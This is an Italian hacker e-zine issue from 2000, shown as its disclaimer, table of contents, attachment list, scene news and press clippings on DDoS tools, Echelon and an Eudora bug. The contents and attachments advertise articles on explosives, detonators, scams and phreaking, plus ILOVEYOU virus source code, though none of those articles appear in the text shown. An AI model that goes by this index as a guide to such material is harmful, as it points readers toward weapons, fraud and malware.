Copy Link
Add to Bookmark
Report

Anarchy in the System No 03

eZine's profile picture
Published in 
Anarchy in the System
 · 25 Apr 2019

  

____ ____ ____ ____ ____ _
_ |___ \| __ \/ __ \|___ \/ __|| | _
(_)/ __ || /| ___// __ || __ \| |(_)
\____/|_|\_\\____|\____/\____/|_|
.:-!lAb0rAt0Ri0 ViRtUaLe 0kkUpAt0 & AuT0gEsTit0-z0nA fRaNcA!-:.
./PreSeNTa:\.
_
____ (_) ____
_ |___ \| |/ ___| _
(_)/ __ || |\___ \(_)
\____/|_||____/
!ANARCHY_IN_THE_SYSTEM!
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-!!!-|HaCkInG|pHrEaKiNg|AnArChY|vIrIi|CrAcKiNg|-!!!-
|CaRdInG|cRyPtO|sCaMmInG|pRoGrAmMiNg|ElEcTrOnIc|
^^^^|WaReZ|tRaShInG|dIsInFo|UnDeRgRoUnD|666|^^^^
^|CyBeRpUnK|cHeMiStRy|NaRcOs|FrEaK|Mp3|^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-=!!! aNNo 01 !!!=-
--[ NuMeRo3 ]--
-[gIuGnO 2000]-
_.-*\SpEcIaL hAcKmEeTiNg20o0/*-._


------------------------------------------------------------------[ iNtr0 ]---
===] DISCLAIMER LEGALE ]======================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------

-Usa queste informazioni a TUO rischio e pericolo. Il Laboratorio Virtuale
Occupato & Autogestito "Area61: Zona Franca" Produzioni Clandestine e
qualsiasi altra persona o crew che abbia scritto articoli per questa E-Zine
non si assumera' NESSUNA responsabilita' per l'uso o l'abuso delle infos
contenute in questo testo.

-Le seguenti informazioni sono state scritte SOLAMENTE per scopo didattico,
informativo e, per la maggiorparte delle volte, puramente RICREATIVO
ed EDONISTICO, e NON possono ASSOLUTAMENTE essere usati per scopi illegali.
Questa E-zine e' stata redatta semplicemente per DIVERTIRE il lettore. ;-)

-"AiS" si puo' considerare come un "magazine" dove viene pubblicato qualunque
forma di informazione, nel pieno rispetto delle liberta' di parola, stampa e
pensiero.

-Pertanto il Laboratorio Virtuale Occupato & Autogestito "Area61" non si
assume alcuna responsabilita' circa gli argomenti trattati in ogni singolo
articolo.
La responsabilita e'SOLO ed ESCLUSIVAMENTE dell'autore, se ce ne dovesse
essere bisogno, e se dovesse essere necessario o opportuno, ogni autore
declinera' le responsabilita' in un disclaimer nei propri articoli.

-Informare non e' in alcun modo illegale. Non si incoraggia tuttavia, chi
volesse usufruire delle informazioni contenute per scopi illegali, o
comunque non attinenti ai principi di civilta', di etica e morali.

-Leggendo questo file tu accetti i seguenti termini: Comprendo che usare le
seguenti informazioni e' un atto illegale. Capisco e accetto di essere il
SOLO responsabile delle mie azioni. Se vengo messo nei guai da queste
informazioni NON incolpero' o tirero' nei guai coloro i quali hanno scritto
questo testo o ogni altro suo collaboratore o qualsiasi altra persona mi
abbia dato questo file. Io capisco che le informazioni qui contenute sono
SOLO per scopo didattico.

-Chi si dovesse ritenere offeso dagli argomenti divulgati in questo
file ESCA SUBITO!!!!!!!!! e cancelli immediatamente questo documento dal
proprio disco.

.:/ Il possesso di questo file, e' comunque del TUTTO LECITO \:.

_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._
|_-_-_-_-_-_-_-_-!!!-=[ AnArChY|iN|tHe|SyStEm ]=-!!!-_-_-_-_-_-_-_-_|
|.-._.-._.-._.-._.-._.-._.uNiVeRsAl E-ZiNe-._.-._.-._.-._.-._.-._.-.|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|:.......................:InDeX_oF_cOnTeNtS:.......................:|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|/.\'/.\'/.\'/.\ArTiCoLo/.\'/.\'/./|\'/.\'/.\'/.\AuToRe/.\'/.\'/.\'\|
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=| iNTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ INTRO & NEWZ ]------<*>----------------->OldirOn61<--<|
|>-[ L'ALTRO CYBERPUNK ]------<*>-------->]CyBOrG[ OldirOn61<--<|
|>-[ GLI ALLEGATI ]------<*>------------------------------<|
|>-[ IN DIRETTA DA DISINFO ]------<*>------->]CyB0rG[ The Jackal<--<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>> -=| cYbErPunX |=- >>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hAcKinG [^^^^^^^^^^^^^^^^^^^^^^|
|>-[ VULNERABILITA' IN NFS ]-<*>-------------------->Vulcan<--<|
|>-[ ATTACCHI AL TCP/IP ]-<*>-------------------->Davser<--<|
|>-[ CONSEAL FIREWALL TUTORIAL ]-<*>----------------->WhITeFiRE<--<|
|>-[ TROJAN? -4 REALLY NEWBIES- ]-<*>------------------->Dmaster<--<|
|>-[ SFRUTTARE UNA SHELL -4 NB- ]-<*>-------------------->Falcon<--<|
|>-[ SICUREZZA PER BAMBINI ]-<*>--------------------->Sash4<--<|
|>-[ BASI DI COLLEGAMENTO... ]-<*>----------------->WhITeFiRE<--<|
|>-[ DESCRIZIONE DI UN ATTACCO. ]-<*>------------------->Kalidor<--<|
|>-[ GIUDIZIO DEI NAVIGATORI... ]-<*>---------------------->ZETA<--<|
|>-[ CLUSTERING & SQL ]-<*>---------------->Maggiorana<--<|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] cRAcKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ ADVANCED ZIP PASSWORD ]->*<------------------>Quequero<-->|
|<-[ MINI-REVERSING DEL NOTEPAD ]->*<--------------------->Golem<-->|
|<-[ LADDOVE IL PROCDUMP ... ]->*<------------------>Quequero<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pRoGrAmMinG [^^^^^^^^^^^^^^^^^^|
|<-[ C TUTORIAL ]------------->*<---------------------->adr3<-->|
|<-[ IL SUBCLASSING ]------------->*<-------------->R A M S E S<--->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] deMo-CoDinG [^^^^^^^^^^^^^^^^^^|
|<-[ PICCOLI DEMO CON IL PC ]----->*<-------------------->Orka4n<-->|
|<-[ EFFETTI: IL PLASMA ]----->*<-------------------->Orka4n<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ SEGRETERIE TELEFONICHE ]----->*<------------------>mR_bIs0n<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG/Old info$ [^^^^^^^^^^^|
|<-[ ASSALTO DELLE CABINE ]----->*<-------------------->/zOKA/<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG/Cellulars [^^^^^^^^^^^|
|<-[ FAKE SMS ]-------->*<------------------>mR_bIs0n<-->|
|<-[ RICARICARE IL CELL. ]-------->*<------------------>mR_bIs0n<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] vIrIi [^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ I LOVE YOU TUTORIAL ]------->*<---------------------->Away<-->|
|<-[ I LOVE YOU DEBUGGING ]------->*<---------------------->ValK<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hArDwArE [^^^^^^^^^^^^^^^^^^^^^|
|>-[ EVOLUZIONE DEI CPU ]---------<*>----------------->H4mBuck3r<--<|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hAck-it00 [^^^^^^^^^^^^^^^^^^^^|
|>-[ SPECIAL HACK-IT 00 ]---------<*>----------------->OldirOn61<--<|
|>-[ HACK-IT RESUME ]---------<*>------------------>Quequero<--<|
|>-[ KALKUTTA'S STORY ]---------<*>------------------>Quequero<--<|
|>-[ I COMMENTI ]---------<*>----------------->OldirOn61<--<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| g00dStuFf |=- >>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] dEsTr0Y! [^^^^^^^^^^^^^^^^^^^^^|
|<-[ LIGHTERS OVERCLOCKING ]-->*<------------------>]CyB0rG[<-->|
|<-[ IL PLASTICO FATTO IN CASA ]-->*<----------------->The Raven<-->|
|<-[ FLAMETHROWER TRAP. ]-->*<--------------------->X_Ted<-->|
|<-[ INNESCHI PER ESPLOSIVI ]-->*<----------------->The Raven<-->|
|<-[ TV IN TILT?? ]-->*<------------------>]CyB0rG[<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] sKamMiNg [^^^^^^^^^^^^^^^^^^^^^|
|<-[ SPEDIRE POSTA A L.0 ]-------->*<------------------>mR_bIs0n<-->|
|<-[ BUS SKAMMING ]-------->*<----------------->The Raven<-->|
|<-[ TRUFFA POSTALE ]-------->*<------------------>mR_bIs0n<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] gArDenInG [^^^^^^^^^^^^^^^^^^^^|
|<-[ MODALITA' DI SEMINA ]-------->*<-------------------->sP3nky<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] nArCoS [^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ DISTINZIONE DEI SESSI ]------>*<----------------->OldirOn61<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] ThInKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ THE DIFFERENCE MACHINE ]----->*<--------------------->aWAy3<-->|
|<-[ UN PO' DI ETICA ]----->*<---------------------->ValK<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] alT.mUsIk [^^^^^^^^^^^^^^^^^^^^|
|<-[ COSTRUIAMO UN DIDGERIDU ]---->*<-------------------->sP3nky<-->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=|0uTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ HOTWEB ]--------------->*<------------------>]CyBOrG[<-->|
|<-[ ROMA - CS(OA)]--------------->*<-------------------->sP3nky<-->|
|<-[ LINKS ]--------------->*<------------------------------<|
|>-[ OUTRO ]---------------<*>----------------->OldirON61<--<|
|<-[ CONTACTS ]--------------->*<------------------------------>|
|>-[ LISTA E-MAIL ]---------------<*>------------------------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.

------------------------------------------------------------------[ iNtr0 ]---
===] INTRO AIS#3 ]============================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------


=] InTrO & NeWz [=

Salve a tutti e benvenuti al numero 3 della nostra e-zine!!!
Sono molto felice di avervi ancora qui, e sono soprattutto contentissimo di
essere arrivati al numero3 (che in realta' e' il 4ø)
Da questo numero, ais cerchera' di mantenere una periodicita' bimestrale...
Questo vuol dire che (forse) ci saranno meno articoli, ma di sicuro in un anno
riusciremo a redarre un numero abbastanza valido (6 + eventuali speciali) di
uscite.

Purtroppo, a causa di impegni con la "vita reale" il sottoscritto (OldirOn61)
non e' riuscito a collaborare come voluto a questa e-zine...mi sono limitato
a fare un paio di articoli di "cazzeggio", il resoconto dell'hack-it, e la
"costruzione" generale dell'e-zine.
Mi scuso con tutti quelli che hanno collaborato, in effetti non ho dato un
ottimo esempio, ma prometto (giurin giurello) che nel numero4 il nome di
OldirOn61 sara' molto + presente...

Le novita' + grandi, oltre al "continuo" restyling del sito di Area61, e' la
nascita di una nuova Mailing List, e di un NewsGroup...alla fine di questo
file ci sono tutti i contatti.

Inoltre (MESSAGGIO PROMOZIONALE) vorrei segnalare che e' nato il canale
#area61 presso il server di AzzurraNet (Chat.jodler.net) e vorrei spezzare una
lancia proprio a favore di questo server...
Azzurranet e' un paradiso per chi sta in IRC solo per chattare e per divulgare
info: Non servono bots, in quanto c'e' Chanserv che "detiene" il canale, non
ci sono riski di Take-Over, se il canale e' vuoto, il primo che entra,
almenoche' non e' registrato dal canale stesso, non avra' l'op, i nick possono
essere lunghi 30 caratteri, il topic di 5 righe....insomma un paradiso
terrestre, anzi, virtuale!!! ;-) Colgo l'occasione per salutare il Duka,
Mayhem e tutti quelli di #ahccc...
C'e' anche la radio ufficiale: RadioJodler (ns1.tdonline.net:8300)

Dopo questa piccola pubblicita' vi lascio alla lettura di AiS3, dai contenuti
sempre + disparati, anche se stiamo cercando, tralasciando gli articoli di
"cazzeggio", di dare alla nostra produzione un carattere + tecnico, senza mai
dimenticare la sfera "NewBies"...

Ah, dimenticavo....

Questa zine ha una lunghezza massima di 78 colonne (Visualizzabile
CORRETTAMENTE anche con una risoluzione minima di 640x480 pixels, con
qualunque comune EDITOR...) e quindi,TUTTI I CODICI (C, ASM, VB, ETC.ETC.)
potrebbero non funzionare, considerato che per la maggiorparte delle volte
siamo stai costretti a mandarli a capo
(non stavano nelle 78 colonne canoniche).... pertanto, se siete amanti del
COPIA/INCOLLA, dovete tribolare un po' di piu'!!!! ;-)

Buona Lettura a tutti, belli e brutti!

pS.
Preparatevi a leggere anche "AiS" (Anarchy in the Summer), la versione
"pazza" di AiS, con poca tecnica e molto, anzi moltissimo SPASSO!!! ;-)

---OldirOn61---


------------------------------------------------------------------[ iNtr0 ]---
===] L'ALTRO CYBERPUNK ]======================================================
-----[ Quequero ]-------------------------------------------------------------

Come al solito diamo uno sguardo a quello che fanno i nostri "cugini" in
italia

=] SpiPPolatori [=

http://www.spippolatori.com

E' uscito NetRunners12, nota rivista made in Spp... il ridlle va sempre +
avanti (ormai non riesco + a starvi dietro...)

=] S0ftPr0ject & bFi Staff [=

http://www.s0ftpj.org


=] NewBies [=

http://www.spippolatori.com (mirror) [ A breve sara' disponibile il sito ]
[ ufficiale ]

E'uscita Newbies6 (downloadabile su http://adryana.cjb.net), la grande rivista
redatta dai mitici Nobo & Dantuzzo.
Qualche errore (Vi siete dimenticati di eliminare il memorandum dallo zip!,
inoltre manca il file "coltivala.zip" ;-P) ma comunque sia, errori o no,
e' sempre una delle e-zine + belle d'italia... sempre + articoli, sembra
quasi un'enciclopedia, sempre + nozioni tecniche... MITICI!!!!!

Messaggio per il Nobo:

"Tu molla newbies ed internet ed io ti vengo a cercare con un macete! a buon
intenditor poche parole!!!!!! Parola di OldirOn61!"

Per concludere un grande saluto a tutta la combriccola di Newbies, aspetto con
ansia il numero7, visto e considerato che il 6 l'ho gia' divorato!

=] Attila_Clan [=

Attila_Clan e' disponibile su http://attilahack.cjb.net

Non ci sono grosse novita', a parte una Mailing List sempre molto attiva
(anche se molte volte ultimamente si e' dato largo spazio alle flames...)
ed una scissione che adesso vi illustrero'...
Un tempo nominato AttilaHack, il gruppo si e' "sfaldato" in due clan:
Attila Clan e i NetKnights...

=] NetKnights [=

E' nata un nuova crew con progetti abbastanza interessanti, si chiama
NetKnights maggiori info al sito

http://netknights.cjb.net/

=] UIC [=

http://www.uic-spippolatori.com

Il sito di Quequero, "rettore" della UIC, e' disponibile ad un nuovo URL:
nato da un regalino degli Spp...
Il vecchio sito cmq (http://quequero.cjb.net) verra' utilizzato come mirror.
Per la cronaca e' inziato il 8ø corso, ed il 5ø corso per newbies...in piu'
sono aggiornate le pagine dedicate al Linux_Reversing ed al PSX_Cracking....
Oltre alla foto dell'area51, e' disponibile il log del meeting, e il "resume"
dell' hack-it00 (Lo trovate anche su questo numero di AiS)

=] SpaghettiPhreakers [=

Il sito, dopo il noto attacco da parte di Hack~Nirvana, e' disponibile presso

http://www.spaghettiphreakers.softitaly.com

Nuovo stile, anche se purtroppo Cdp, principale fautore di SP, e' costretto
a mollare la propria produzione, a causa del servizio di leva.
C'e' anche l'attiva (anzi attivissima) ML, presso il server di egroups.
Un saluto a Prodigy e a tutta la SpaghettiPhreakers Crew!

=] X-Brain [=

E' nata dalla colalborazione tra T0rment0 e Techno Knight una nuova zine,
molto ben curata: si chiama Xbrain ed è disponibile presso

http://www.whi.cjb.net/


=] Ninfo [=

Molti di voi si chiedono dove sia finito Avatar... ...beh, adesso ha un po'
messo da parte bombe e simili per dedicarsi a un'ezine aperiodica di
disinformazione(grande Avatar!) reperibile presso il sito di Lopks (al quale
mando un saluto ;-)

http://come.to/lopks

---OldirOn61*]CyBOrG[---


+[ Gli aLlEgAti ]+

-conseal_crash.zip -> Script descritto nell'articolo di WhITeFiRE
- iloveu.zip -> Codice sorgente del Virus "I love you"
Commentato da away3
- valkloveu.zip -> Codige sorgente (senza commenti) art. di ValK
- didgeridu.zip -> I Suoni del didgeridu (art. di sP3nKy)
- memory.zip -> "Patch in Memory" Articolo di Quequero
- unpack.zip -> "Unpack" Articolo di Quequero (bis)

------------------------------------------------------------------[ iNtr0 ]---
===] IN DIRETTA DA DISINFO ]==================================================
-----[ ]CyBOrG[ & The Jackal ]------------------------------------------------


DiSiNf0 è una agenzia (dis)informativa autonoma, tenendo conto
che i media ufficiali pubblicano solo cio' che ritengono opportuno,
cio' che ritengono 'far notizia', cio' che vogliono farci sapere
mirando bene a neutralizzare la veriticita' delle notizie o a
manipolarle a loro piacere... ci proponiamo di aggiornarvi con
notizie selezionate, da ritagli di carta (di stampe alternative)
e pagine elettroniche, notizie che difficilmente i media ufficiali
trattano o, se lo fanno, notizie cui viene dato uno spazio infimo
atto solo a riempire gli spazi vuoti delle loro futili testate.
Da questo numero, per problemi di tempo, siamo costretti a non poter
piu' scrivere da noi gli articoli di questa sezione ma cio' non vuol
dire che dovrete rinunciarvi, infatti, avrete modo di leggere comunque
le notizie che da oggi verrano direttamente cut/pastate dai siti
di informazione alternativa quali: Zeus News, Strano Network, Indy Media
Punto informatico, Apogeonline, Speaker Korner, Chl, Mediamente,
Kontrokultura, Mondo Underground, Neural...
...le news sono selezionate da ]CyB0rG[ e The Jackal.



+--< Microsoft e IBM implicati in Echelon >--+ ]25/02/2000[ InTeLlIGeNcE ]

Secondo Duncan Campbell, relatore davanti alla Commissione del Parlamento
europeo per le libertà e i diritti dei cittadini, la giustizia e gli affari
interni, nell'ambito dell'audizione su "l'Unione europea e la protezione
dei dati"

http://wwwdb.europarl.eu.int/ep/owa/
p_calag.oj?ipid=495407&imn=9976&ilg=IT&iorig=sg/tree

i computer prodotti dalla IBM e dotati di sistemi operativi Microsoft
sarebbero equipaggiati con un microsistema di ascolto. I dati raccolti
sulle attività commerciali e militari dei paesi concorrenti verrebbero
monitorati all'interno del progetto Echelon, di cui avevamo parlato nelle
ZEUS News del 29 gennaio.
Dell'organizzazione di monitoraggio farebbe parte anche il Regno Unito,
nonostante la secca smentita di Tony Blair dopo l'incontro a Bruxelles con
il presidente della Commissione Ue Romano Prodi.
In base a queste considerazioni, diventa meno contraddittoria l'attenzione
dei politici americani per il processo antitrust di Washington, di cui si
sta svolgendo l'ultima udienza, dal momento che il monopolio mondiale
della Microsoft nei sistemi operativi è probabilmente servito agli Stati
Uniti per le proprie attività spionistiche.
Proprio i sospetti di possibili infiltrazioni ha indotto recentemente il
governo cinese ad equipaggiare i computer di tutto l'apparato
amministrativo con il sistema operativo Linux.


+--< Cyberpirati? da oggi e' piu' facile >--+ ]25/02/2000[ Cyberwar ]

Una nuova versione del software che ha paralizzato diversi siti nelle
scorse settimana permette ai pirati di lanciare i loro attacchi da un
normale PC con sistema operativo Windows. In una relazione presentata a San
Jose in California, si dice che il nuovo "zombie" software da' la
possibilta' ai pirati di lanciare un attacco di tipo "coordinated
distributed denial of service" verso qualsiasi obbiettivo, da un semplice
PC con Windows, invece che da potenti server Unix.
Gli attacchi effettuati tramite il sistema DDoS possono paralizzare un
computer, bombardandolo con un enorme numero di richieste nello stesso
momento. Nella stessa relazione si dice che il nuovo software puo' essere
trasmesso via e-mail come un normalissimo trojan, e in seguito pilotato da
remoto, in modo simile a come gia' accadeva qualche tempo fa fa con il
software "Back Orifice".
Il fatto che software di questo tipo sia disponibile anche per piattaforme
Windows significa che lanciare un attacco DDoS sara' ancora piu' facile di
prima, visto che il sitema operativo sviluppato dalla Microsoft e' il piu'
diffuso al mondo.


+--< SIAE+GdF=!!! >--+ ]08/03/2000[ Censura ]

Tratto dal quotidiano economico "Italia Oggi":

"La Siae, la direzione centrale di polizia criminale per la polizia
di stato, il comando generale dell'arma dei carabinieri e il corpo
della guardia di finanza hanno dato avvio a un'importante intesa
contro la pirateria multimediale.
A renderlo noto è stata la stessa società italiana autori ed editori
con un comunicato stampa. <<Scopo dell'intesa>>, si legge nel
comunicato diramato dalla Siae, <<è collaborare, mettendo in comune
le rispettive conoscenze ed esperienze, per contrastare le attività
criminose nel settore dei marchi e delle opere dell'ingegno tutelate,
in particolare della pirateria audiovisiva e informatica>>.
Il progetto troverà applicazione pratica attraverso due direttrici:
- a livello centrale, con un costante monitoraggio del fenomeno della
pirateria, mediante lo scambio e l'interazione di tutti i dati
disponibili e con l'invio conseguente di direttive ai rispettivi
organismi locali;
- a livello periferico, con una sinergica attività operativa tra le
articolazioni provinciali delle forze di polizia e della Siae per
un'azione di contrasto più efficace e mirata."


+--< Combattere i crimini informatici >--+ ]15/03/2000[ Computercrime ]

Il dipartimento di giustizia degli Stati Uniti ha messo in Rete un nuovo
sito(www.cybercrime.com) per diffondere informazioni sulle iniziative
intraprese per combattere il crimine informatico. Il nuovo sito fornisce
notizie di vario genere a diversi livelli di approfondimento, che potranno
essere utilizzate tanto nelle spiegazioni scolastiche che nelle procedure
legali. Vengono diffuse informazioni sull'hacking, sulle violazioni alla
proprietà intellettuale (problemi legati alla contraffazione e più in
generale al commercio elettronico), la libertà di parola (problematiche
riguardo discorsi che incitano all'odio - specialmente razziale, ma
anche riguardo la diffusione di informazioni sulla costruzione di bombe),
la crittografia e la privacy. Martha Stansell-Gamm, capo della sezione
crimini informatici del dipartimento di Giustizia americano, ha
commentato: "Rendendo agevole l'accesso ai materiali, speriamo d'informare
il pubblico sulle leggi speciali sui crimini informatici. Essere connessi
al World Wide Web facilita anche il nostro lavoro in collaborazione con
le autorità giudiziarie di tutto il mondo".


+--< Europa: entreremo nei vostri computer >--+ ]02/05/2000[ Bug ]

Londra e Bruxelles negli ultimi giorni hanno assestato un poderoso uno-due
alla libertà digitale. Da Downing Street è infatti arrivata la conferma di un
progetto da 75 miliardi di lire per consentire alle forze di sicurezza di
entrare facilmente nelle email che vengono inviate e ricevute dai sudditi del
Regno Unito.
E da Bruxelles arrivano i primi segnali di intesa in ambito europeo sulla
lotta al crimine informatico, lotta il cui mezzo principale pare essere la
possibilità di perquisire i computer degli utenti internet "a distanza", con
tutti gli annessi e connessi sul piano tecnico. Ma andiamo con ordine. Stando
alle notizie provenienti da Londra, il progettone del governo è in fase
avanzata di realizzazione, tanto che sarà attivato entro la fine dell'anno.
La sede del "Government Technical Assistance Center" sarà all'interno del
quartiere generale dei servizi segreti britannici a Londra. L'idea di fondo è
quella di consentire alla polizia di entrare facilmente nelle comunicazioni
elettroniche "al solo fine investigativo". Di fronte all'alzata di scudi delle
associazioni dei consumatori e della difesa della libertà digitali, che
ritengono gravissimo il piano del governo, un portavoce degli interni ha
affermato che "non c'è modo per i servizi di sicurezza di monitorare la posta
elettronica di ciascuno. Il sistema è pensato solo per assistere le attività
investigative. Ogni intercettazione sarà ottenuta esattamente come accade oggi
per altri strumenti, ovvero attraverso un mandato che dev'essere firmato dal
ministro degli Interni". La seconda parte di quanto accaduto durante questo
lungo e poco tranquillo weekend di paura arriva da Bruxelles. I 41 paesi del
Consiglio d'Europa, infatti, sembrano vicini ad approvare un progetto di
convenzione per combattere il crimine informatico. L'idea è quella di
coordinare gli sforzi delle autorità di sicurezza dei singoli paesi e di
attivare una serie di nuovi strumenti tra cui la "perquisizione informatica a
distanza". Con questa definizione si intende lo sviluppo di tecnologie e
procedure di controllo, che dovranno evidentemente essere sviluppate e
imposte ai fornitori di servizi internet, che consentano alle polizie di
"perquisire" i computer di chi è sotto inchiesta anche da remoto, ovvero
senza pervenire alle perquisizioni e ai sequestri tradizionali. E' ancora
presto per capire come si evolverà questo schema di intesa e quali passi
saranno intrapresi per assicurare alle forze dell'Ordine queste nuove
possibilità, ma se quella di Londra è una scelta, forse siamo di fronte al
modello che dalle isole britanniche potrebbe scendere sul Continente per
strangolarlo.


+--< Occhio, Eudora è bacata >--+ ]03/05/2000[ Bug ]

Eudora espone i suoi utenti ad un grave problema di sicurezza.
L'ha confermato anche la "mamma" del celebre programmone di gestione della
posta elettronica, Qualcomm. Pare proprio che sia possibile, e molto
facilmente, inviare ad un utente di Eudora su Windows un file eseguibile
senza che il sistema se ne accorga e avverta l'utente della sua potenziale
pericolosità. Per fare questo è sufficiente modificare l'estensione del
file da .exe a .lnk. Così facendo Eudora non fa partire l'avvertimento
sulla vera natura del file stesso.
Il bug l'ha trovato quello smanettone di Bennett Haselton di Peacefire,
già noto per le sue attività sui software Microsoft, che ha dimostrato
quanto sia facile inviare un file distruttivo ad un utente Eudora.
Stando al direttore tecnico di Eudora, Jeff Backley, siamo di fronte
"ad una via per bypassare le capacità di avvertimento del programma".
Per questo l'estensione .lnk sarà inserita nella lista dei file che
chiedono un check all'utente quando arrivano come attachment nei messaggi
di email. Ma questo accadrà nella versione 4.3.2 del programma prevista
solo tra qualche settimana.
Nel frattempo chi si vuole cautelare può seguire due strade.
Se dispone di una versione di Eudora 4.2 o successive, può copiare la
stringa

"x-Eudora-option:WarnLaunchExtensions=exe|com|bat|cmd|pif|htm|do|xl|reg|lnk|"

all'interno del file Eudora.ini sulla linea "Settings". In questo modo
l'estensione .lnk viene aggiunta tra quelle "a rischio".


+--< Allarme Mstream, supercodice di aggressione >--+ ]03/05/2000[ Cyberwar ]

Dave Dittrich, amministratore di sistema della Università di Washington,
ha lanciato l'allarme per quello che definisce un tool di attacco cyber
molto più pericoloso dei vari Trinoo, TFNK2 e via dicendo. Un tool che
potrebbe rendere più semplici e letali attacchi come quelli che lo scorso
febbraio hanno portato giù i server di Yahoo e Amazon.
Secondo Dittrich, che gode di enorme ascolto tra gli esperti di sicurezza,
Mstream consente di realizzare aggressioni contro server web più pesanti
dei DDoS (Distributed Denial of Service) "tradizionali" e con un numero
minore di server da cui vengono fatti partire i messaggi per mandare in
tilt "il computer vittima".
In una analisi di Mstream si rileva che il programma, che sta girando
sulla rete, è ancora nelle prime fasi del suo sviluppo. E i danni che
potrebbe procurare non riguardano solo il computer vittima ma anche i
server utilizzati per colpire. Mstream per riuscire in questo conta sulle
tecniche di "egress filtering", tradizionalmente pensate per consentire
ai server di scartare i pacchetti inviati nell'attacco. "Stimolata",
questa tecnica può finire per portare giù anche il sito internet del
server utilizzato per inviare l'attacco.
Secondo Dittrich occorre iniziare a pensare che per sconfiggere i DDoS
non basta lavorare sulle tecnologie di filtro dei pacchetti. L'esperto
ha spiegato che la sua analisi di Mstream si basa sul ritrovamento dello
stesso in un computer Linux di una grande università il mese scorso.
Quel server, ha detto, attaccava 12 siti web contemporaneamente.
Secondo Dittrich l'analisi di Mstream deve ancora essere completata ma
l'allarme è stato lanciato perché il codice è arrivato sulla mailing list
